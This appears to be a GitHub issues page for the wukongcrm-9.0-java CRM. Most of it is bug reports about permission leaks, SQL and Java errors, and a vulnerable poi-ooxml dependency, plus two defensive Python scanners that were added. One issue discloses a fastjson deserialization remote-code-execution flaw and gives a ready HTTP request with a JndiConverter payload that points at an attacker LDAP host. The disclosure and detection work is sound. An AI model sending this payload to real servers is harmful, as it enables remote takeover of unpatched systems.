
wukongcrm-9.0-java's People

Contributors

gspiriter, wukongsoftware


wukongcrm-9.0-java's Issues

Data isolation on the workbench is broken

The data isolation on the home-page workbench is wrong. After adding a schedule and setting its data permission in the back end so that only the owner can see it, everyone in the same department can still see it (people in other departments cannot); only the owner should be able to see it. Entering through the Schedule menu shows the correct result, but the workbench still shows records belonging to other people in the same department.

Remote command execution vulnerability

In version 72crm_9.0.1_20191202, insecure components are used, which causes potential remote command execution. Attackers can directly attack the system without authorization.
An insecure version of the fastjson component was used
First we found a vulnerability trigger:
http://localhost:8080/CrmCustomer/queryPageList
The constructor of BasePageRequest is called for processing. During processing, fastjson's parseObject() method is first called to parse the JSON string into a Java bean. Due to the deserialization vulnerability in this version of fastjson, attackers just visit /CrmCustomer/queryPageList and enter a malicious JSON string to trigger the vulnerability.
There are many attack modes in version 1.2.54, and only one of them is shown below:
This attack requires the xbean jar package to be present and AutoType to be enabled.
Start the attack
POC:
POST /CrmCustomer/queryPageList HTTP/1.1
Host: localhost:8080
Content-Length: 115
Content-Type: application/json;charset=UTF-8
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Connection: close

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://ip:port/Basic/Command/calc"}"
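The report above hinges on one thing the server lets through: a request body whose JSON carries fastjson's "@type" key while AutoType is enabled. The following is an added example, not code from the issue or from the wukongcrm project: a request-body check, of the kind a reverse proxy or servlet filter in front of /CrmCustomer/queryPageList could run, that flags any document containing that key at any depth. It inspects the parsed document rather than the raw text, so escaped spellings of the key are caught as well. All sample bodies and class names are constructed placeholders.

```python
"""Added example (not part of the original issue or of the wukongcrm project):
flag JSON request bodies that carry fastjson's "@type" polymorphic-type key,
the hook the report above relies on when AutoType is enabled.
All sample bodies below are constructed; the class names are placeholders."""
import json
from typing import Any, Dict, List

TYPE_KEY = "@type"


def find_type_keys(node: Any, path: str = "$") -> List[str]:
    """Return the location of every "@type" key in a parsed JSON document,
    descending through nested objects and arrays."""
    hits: List[str] = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == TYPE_KEY:
                hits.append(child)
            hits.extend(find_type_keys(value, child))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_type_keys(item, f"{path}[{i}]"))
    return hits


def check_body(raw: str) -> Dict[str, Any]:
    """Classify one request body: "allow", "block" (type key present) or
    "malformed" (not JSON; reported rather than silently passed through)."""
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError as exc:
        return {"verdict": "malformed", "hits": [], "detail": str(exc)}
    hits = find_type_keys(doc)
    return {
        "verdict": "block" if hits else "allow",
        "hits": hits,
        "detail": "type key present" if hits else "ok",
    }


# Constructed sample bodies. "escaped_type" spells the key as \u0040type,
# which a JSON parser decodes to "@type" before the key comparison runs.
SAMPLES: Dict[str, str] = {
    "page_query":     '{"page": 1, "limit": 15, "search": "acme"}',
    "top_level_type": '{"@type": "com.example.Placeholder", "x": 1}',
    "nested_type":    '{"data": [{"name": "ok"}, {"@type": "com.example.Other"}]}',
    "escaped_type":   '{"\\u0040type": "com.example.Placeholder"}',
    "not_json":       '{"page": 1,',
}


def scan_samples() -> Dict[str, str]:
    """Verdict per sample body; used by the self-check in the test."""
    return {name: check_body(body)["verdict"] for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        result = check_body(body)
        print(f"{name:15s} {result['verdict']:10s} {result['hits']}")
```

A check like this is a containment and detection layer, useful for logging and blocking while a deployment is being patched; the fix the report implies is still to upgrade the fastjson dependency and keep AutoType disabled, since the attack path described above depends on AutoType being on.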

Error when fetching the customer list

Caused by: com.mysql.jdbc.MysqlDataTruncation: Data truncation: BIGINT UNSIGNED value is out of range in '((to_days(`crm9`.`a`.`update_time`) + cast((select `crm9`.`72crm_admin_config`.`value` from `crm9`.`72crm_admin_config` where (`crm9`.`72crm_admin_config`.`name` = 'customerPoolSettingFollowupDays')) as unsigned)) - to_days(now()))'
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3971)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:873)
        at com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:1996)
        at com.mysql.jdbc.MysqlIO.readSingleRowSet(MysqlIO.java:3410)
        at com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:470)
        at com.mysql.jdbc.MysqlIO.readResultsForQueryOrUpdate(MysqlIO.java:3112)
        at com.mysql.jdbc.MysqlIO.readAllResults(MysqlIO.java:2341)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2736)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2487)
        at com.mysql.jdbc.PreparedStatement.executeInternal(PreparedStatement.java:1858)
        at com.mysql.jdbc.PreparedStatement.executeQuery(PreparedStatement.java:1966)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2714)
        at com.alibaba.druid.wall.WallFilter.preparedStatement_executeQuery(WallFilter.java:622)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
        at com.alibaba.druid.filter.FilterEventAdapter.preparedStatement_executeQuery(FilterEventAdapter.java:465)
        at com.alibaba.druid.filter.FilterChainImpl.preparedStatement_executeQuery(FilterChainImpl.java:2711)
        at com.alibaba.druid.proxy.jdbc.PreparedStatementProxyImpl.executeQuery(PreparedStatementProxyImpl.java:145)
        at com.alibaba.druid.pool.DruidPooledPreparedStatement.executeQuery(DruidPooledPreparedStatement.java:227)
        at com.jfinal.plugin.activerecord.DbPro.find(DbPro.java:314)
        at com.jfinal.plugin.activerecord.DbPro.doPaginateByFullSql(DbPro.java:578)
        at com.jfinal.plugin.activerecord.DbPro.doPaginate(DbPro.java:535)

Dependency org.apache.poi:poi-ooxml, leading to CVE problem

Hi, in 72crm-9.0-JAVA there is a dependency org.apache.poi:poi-ooxml:3.17 that calls the risk method.

CVE-2019-12415

The affected version range of this CVE is [,4.1.0)

After further analysis, in this project the main API called is <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>

Risk method repair link: GitHub

CVE Bug Invocation Path--

Path Length : 4

<org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String getStringCellValue()>
at <org.apache.poi.xssf.streaming.SXSSFCell: org.apache.poi.ss.usermodel.RichTextString getRichStringCellValue()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[453]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <org.apache.poi.xssf.streaming.SXSSFCell: java.lang.String toString()> (org.apache.poi.xssf.streaming.SXSSFCell.java:[768]) in /.m2/repository/org/apache/poi/poi-ooxml/3.17/poi-ooxml-3.17.jar
at <com.kakarote.crm9.erp.crm.service.CrmLeadsService: com.kakarote.crm9.utils.R uploadExcel(com.jfinal.upload.UploadFile,java.lang.Integer,java.lang.Integer)> (com.kakarote.crm9.erp.crm.service.CrmLeadsService.java:[393]) in /detect/unzip/72crm-9.0-JAVA-9.0.1_20191202/target/classes

Dependency tree--

[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.jfinal:jfinal-undertow:jar:1.9:compile
[INFO] |  +- io.undertow:undertow-core:jar:2.0.25.Final:compile
[INFO] |  |  +- org.jboss.logging:jboss-logging:jar:3.4.0.Final:compile
[INFO] |  |  +- org.jboss.xnio:xnio-api:jar:3.3.8.Final:compile
[INFO] |  |  \- org.jboss.xnio:xnio-nio:jar:3.3.8.Final:runtime
[INFO] |  +- io.undertow:undertow-servlet:jar:2.0.25.Final:compile
[INFO] |  \- javax.servlet:javax.servlet-api:jar:4.0.1:compile
[INFO] +- com.jfinal:jfinal:jar:3.8:compile
[INFO] +- cglib:cglib-nodep:jar:3.2.5:compile
[INFO] +- com.jfinal:cos:jar:2019.8:compile
[INFO] +- it.sauronsoftware.cron4j:cron4j:jar:2.2.5:compile
[INFO] +- redis.clients:jedis:jar:2.9.0:compile
[INFO] |  \- org.apache.commons:commons-pool2:jar:2.4.2:compile
[INFO] +- de.ruedigermoeller:fst:jar:2.50:compile
[INFO] |  +- com.fasterxml.jackson.core:jackson-core:jar:2.8.8:compile
[INFO] |  +- org.javassist:javassist:jar:3.21.0-GA:compile
[INFO] |  +- org.objenesis:objenesis:jar:2.5.1:compile
[INFO] |  \- com.cedarsoftware:java-util:jar:1.9.0:compile
[INFO] |     +- commons-logging:commons-logging:jar:1.1.1:compile
[INFO] |     \- com.cedarsoftware:json-io:jar:2.5.1:compile
[INFO] +- org.slf4j:slf4j-nop:jar:1.7.25:compile
[INFO] |  \- org.slf4j:slf4j-api:jar:1.7.25:compile
[INFO] +- log4j:log4j:jar:1.2.16:compile
[INFO] +- mysql:mysql-connector-java:jar:5.1.44:compile
[INFO] +- com.alibaba:druid:jar:1.0.29:compile
[INFO] |  +- com.alibaba:jconsole:jar:1.8.0:system
[INFO] |  \- com.alibaba:tools:jar:1.8.0:system
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- cn.hutool:hutool-all:jar:4.4.0:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] |  +- org.apache.poi:poi:jar:3.17:compile
[INFO] |  |  +- commons-codec:commons-codec:jar:1.10:compile
[INFO] |  |  \- org.apache.commons:commons-collections4:jar:4.1:compile
[INFO] |  +- org.apache.poi:poi-ooxml-schemas:jar:3.17:compile
[INFO] |  |  \- org.apache.xmlbeans:xmlbeans:jar:2.6.0:compile
[INFO] |  |     \- stax:stax-api:jar:1.0.1:compile
[INFO] |  \- com.github.virtuald:curvesapi:jar:1.04:compile
[INFO] +- com.aliyun:aliyun-java-sdk-core:jar:4.0.6:compile
[INFO] |  +- com.google.code.gson:gson:jar:2.8.2:compile
[INFO] |  +- org.apache.httpcomponents:httpclient:jar:4.5.3:compile
[INFO] |  |  \- org.apache.httpcomponents:httpcore:jar:4.4.6:compile
[INFO] |  +- javax.xml.bind:jaxb-api:jar:2.1:compile
[INFO] |  |  \- javax.xml.stream:stax-api:jar:1.0-2:compile
[INFO] |  +- com.sun.xml.bind:jaxb-core:jar:2.1.14:compile
[INFO] |  +- com.sun.xml.bind:jaxb-impl:jar:2.1:compile
[INFO] |  \- javax.activation:activation:jar:1.1.1:compile
[INFO] +- com.aliyun:aliyun-java-sdk-dysmsapi:jar:1.1.0:compile
[INFO] \- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile

Suggested solutions:

Update dependency version

Thank you very much.
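The report above gives two things a supply-chain check needs: the `mvn dependency:tree` output of the project and an affected version range, [,4.1.0), for CVE-2019-12415 on org.apache.poi:poi-ooxml. The following is an added example, not code from the issue or from the project: it parses tree lines of that format into coordinates and depth, evaluates Maven-style version ranges, and reports every artifact whose version falls inside an advisory's range. The tree lines embedded below are a subset copied from the report; the only advisory entry is the one the report states, and the version comparison deliberately ignores non-numeric qualifiers such as "Final".

```python
"""Added example, not part of the original issue or of the project: parse
`mvn dependency:tree` output (the format shown in the report above) and flag
artifacts whose version falls inside a CVE's affected version range."""
import re
from typing import Dict, List, NamedTuple, Tuple


class Artifact(NamedTuple):
    group: str
    artifact: str
    version: str
    scope: str   # "" for the project's own root line
    depth: int   # 0 = the project itself, 1 = direct dependency, 2 = transitive, ...


class Advisory(NamedTuple):
    cve: str
    coordinates: str  # "groupId:artifactId"
    affected: str     # Maven-style range, e.g. "[,4.1.0)" = everything below 4.1.0


# The single advisory stated in the report above; a real run would load these
# from an advisory feed instead of hard-coding them.
ADVISORIES: List[Advisory] = [
    Advisory("CVE-2019-12415", "org.apache.poi:poi-ooxml", "[,4.1.0)"),
]

# Subset of the dependency tree printed in the report above.
TREE_LINES: List[str] = r"""
[INFO] com.kakarote:crm9:jar:1.3.3
[INFO] +- com.alibaba:fastjson:jar:1.2.54:compile
[INFO] +- org.apache.poi:poi-ooxml:jar:3.17:compile
[INFO] |  +- org.apache.poi:poi:jar:3.17:compile
[INFO] |  |  +- commons-codec:commons-codec:jar:1.10:compile
[INFO] |  \- com.github.virtuald:curvesapi:jar:1.04:compile
[INFO] \- com.github.ben-manes.caffeine:caffeine:jar:2.6.2:compile
""".strip().splitlines()


def parse_tree(lines: List[str]) -> List[Artifact]:
    """Turn tree lines into Artifacts. Each tree level is drawn with a
    three-character cell ("+- ", "\\- ", "|  " or spaces), so depth is the
    width of the drawing prefix divided by three. Lines that do not carry
    groupId:artifactId:type[:classifier]:version[:scope] are skipped."""
    out: List[Artifact] = []
    for line in lines:
        if not line.startswith("[INFO] "):
            continue
        rest = line[len("[INFO] "):]
        coords = rest.lstrip("+-\\| ")
        depth = (len(rest) - len(coords)) // 3
        parts = coords.strip().split(":")
        if len(parts) < 4:
            continue
        if len(parts) == 4:           # root line: no scope
            version, scope = parts[3], ""
        else:                         # with scope, optionally with classifier
            version, scope = parts[-2], parts[-1]
        out.append(Artifact(parts[0], parts[1], version, scope, depth))
    return out


def version_key(v: str) -> Tuple[int, ...]:
    """Numeric prefix of a version: "2.0.25.Final" -> (2, 0, 25). Qualifiers
    are ignored, which is sufficient for the simple ranges used here."""
    nums: List[int] = []
    for piece in re.split(r"[.\-]", v):
        if piece.isdigit():
            nums.append(int(piece))
        else:
            break
    return tuple(nums)


def compare_versions(a: str, b: str) -> int:
    """-1, 0 or 1, comparing numeric components and padding with zeros."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += (0,) * (n - len(ka))
    kb += (0,) * (n - len(kb))
    return (ka > kb) - (ka < kb)


RANGE_RE = re.compile(r"^([\[(])\s*([^,\])]*)\s*,\s*([^\])]*)\s*([\])])$")


def version_in_range(version: str, spec: str) -> bool:
    """Evaluate a Maven range with a comma: [ / ] are inclusive, ( / ) are
    exclusive, an empty bound is open. Single-version specs are not handled."""
    m = RANGE_RE.match(spec.strip())
    if not m:
        raise ValueError(f"unsupported range: {spec}")
    lo_br, lo, hi, hi_br = m.groups()
    lo, hi = lo.strip(), hi.strip()
    if lo:
        c = compare_versions(version, lo)
        if c < 0 or (c == 0 and lo_br == "("):
            return False
    if hi:
        c = compare_versions(version, hi)
        if c > 0 or (c == 0 and hi_br == ")"):
            return False
    return True


def find_affected(lines: List[str], advisories: List[Advisory]) -> List[Tuple[Artifact, Advisory]]:
    """Every (artifact, advisory) pair where the resolved version is affected."""
    by_coords: Dict[str, List[Advisory]] = {}
    for adv in advisories:
        by_coords.setdefault(adv.coordinates, []).append(adv)
    hits: List[Tuple[Artifact, Advisory]] = []
    for art in parse_tree(lines):
        for adv in by_coords.get(f"{art.group}:{art.artifact}", []):
            if version_in_range(art.version, adv.affected):
                hits.append((art, adv))
    return hits


if __name__ == "__main__":
    for art, adv in find_affected(TREE_LINES, ADVISORIES):
        print(f"{adv.cve}: {art.group}:{art.artifact}:{art.version} "
              f"(depth {art.depth}, scope {art.scope or 'root'}) in {adv.affected}")
```

Because the hit carries the depth, the output also tells you whether the affected artifact is a direct dependency you can bump in the pom (as poi-ooxml is here) or a transitive one that needs a managed-version override; the report's suggested remediation, updating the dependency version, applies either way.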

Business intelligence: data permissions

Version V9.2.3.191220
In the back-end settings the customer-management role's data permission is set to "self only", but in Business Intelligence the template's statistics and analysis still cover the data of everyone in the corresponding department.

Leads: error when deleting

2019-07-22 13:21:33,245 [ERROR][XNIO-1 task-111][ErpInterceptor.java:49] 响应错误
com.jfinal.plugin.activerecord.ActiveRecordException: java.lang.IllegalArgumentException: The element in list must be Model or Record.
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1050)
        at com.jfinal.plugin.activerecord.Db.batch(Db.java:617)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService.lambda$deleteByIds$0(CrmLeadsService.java:155)
        at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:770)
        at com.jfinal.plugin.activerecord.DbPro.tx(DbPro.java:807)
        at com.jfinal.plugin.activerecord.Db.tx(Db.java:545)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService.deleteByIds(CrmLeadsService.java:153)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.CGLIB$deleteByIds$7(<generated>)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c$$FastClassByCGLIB$$58167888.invoke(<generated>)
        at net.sf.cglib.proxy.MethodProxy.invokeSuper(MethodProxy.java:228)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:81)
        at com.jfinal.aop.Callback.intercept(Callback.java:68)
        at com.kakarote.crm9.erp.crm.service.CrmLeadsService$$EnhancerByCGLIB$$21e3de3c.deleteByIds(<generated>)
        at com.kakarote.crm9.erp.crm.controller.CrmLeadsController.deleteByIds(CrmLeadsController.java:100)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:74)
        at com.kakarote.crm9.erp.crm.common.CrmInterceptor.intercept(CrmInterceptor.java:84)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.kakarote.crm9.common.interceptor.AuthInterceptor.intercept(AuthInterceptor.java:39)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.kakarote.crm9.common.interceptor.ErpInterceptor.intercept(ErpInterceptor.java:46)
        at com.jfinal.aop.Invocation.invoke(Invocation.java:68)
        at com.jfinal.core.ActionHandler.handle(ActionHandler.java:89)
        at com.jfinal.plugin.druid.DruidStatViewHandler.handle(DruidStatViewHandler.java:81)
        at com.jfinal.core.JFinalFilter.doFilter(JFinalFilter.java:89)
        at io.undertow.servlet.core.ManagedFilter.doFilter(ManagedFilter.java:61)
        at io.undertow.servlet.handlers.FilterHandler$FilterChainImpl.doFilter(FilterHandler.java:131)
        at io.undertow.servlet.handlers.FilterHandler.handleRequest(FilterHandler.java:84)
        at io.undertow.servlet.handlers.security.ServletSecurityRoleHandler.handleRequest(ServletSecurityRoleHandler.java:62)
        at io.undertow.servlet.handlers.ServletChain$1.handleRequest(ServletChain.java:68)
        at io.undertow.servlet.handlers.ServletDispatchingHandler.handleRequest(ServletDispatchingHandler.java:36)
        at io.undertow.servlet.handlers.security.SSLInformationAssociationHandler.handleRequest(SSLInformationAssociationHandler.java:132)
        at io.undertow.servlet.handlers.security.ServletAuthenticationCallHandler.handleRequest(ServletAuthenticationCallHandler.java:57)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.security.handlers.AbstractConfidentialityHandler.handleRequest(AbstractConfidentialityHandler.java:46)
        at io.undertow.servlet.handlers.security.ServletConfidentialityConstraintHandler.handleRequest(ServletConfidentialityConstraintHandler.java:64)
        at io.undertow.security.handlers.AuthenticationMechanismsHandler.handleRequest(AuthenticationMechanismsHandler.java:60)
        at io.undertow.servlet.handlers.security.CachedAuthenticatedSessionHandler.handleRequest(CachedAuthenticatedSessionHandler.java:77)
        at io.undertow.security.handlers.AbstractSecurityContextAssociationHandler.handleRequest(AbstractSecurityContextAssociationHandler.java:43)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.server.handlers.PredicateHandler.handleRequest(PredicateHandler.java:43)
        at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest(ServletInitialHandler.java:292)
        at io.undertow.servlet.handlers.ServletInitialHandler.access$100(ServletInitialHandler.java:81)
        at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:138)
        at io.undertow.servlet.handlers.ServletInitialHandler$2.call(ServletInitialHandler.java:135)
        at io.undertow.servlet.core.ServletRequestContextThreadSetupAction$1.call(ServletRequestContextThreadSetupAction.java:48)
        at io.undertow.servlet.core.ContextClassLoaderSetupAction$1.call(ContextClassLoaderSetupAction.java:43)
        at io.undertow.servlet.handlers.ServletInitialHandler.dispatchRequest(ServletInitialHandler.java:272)
        at io.undertow.servlet.handlers.ServletInitialHandler.access$000(ServletInitialHandler.java:81)
        at io.undertow.servlet.handlers.ServletInitialHandler$1.handleRequest(ServletInitialHandler.java:104)
        at io.undertow.server.Connectors.executeRootHandler(Connectors.java:364)
        at io.undertow.server.HttpServerExchange$1.run(HttpServerExchange.java:830)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.IllegalArgumentException: The element in list must be Model or Record.
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:973)
        at com.jfinal.plugin.activerecord.DbPro.batch(DbPro.java:1048)
        ... 57 more
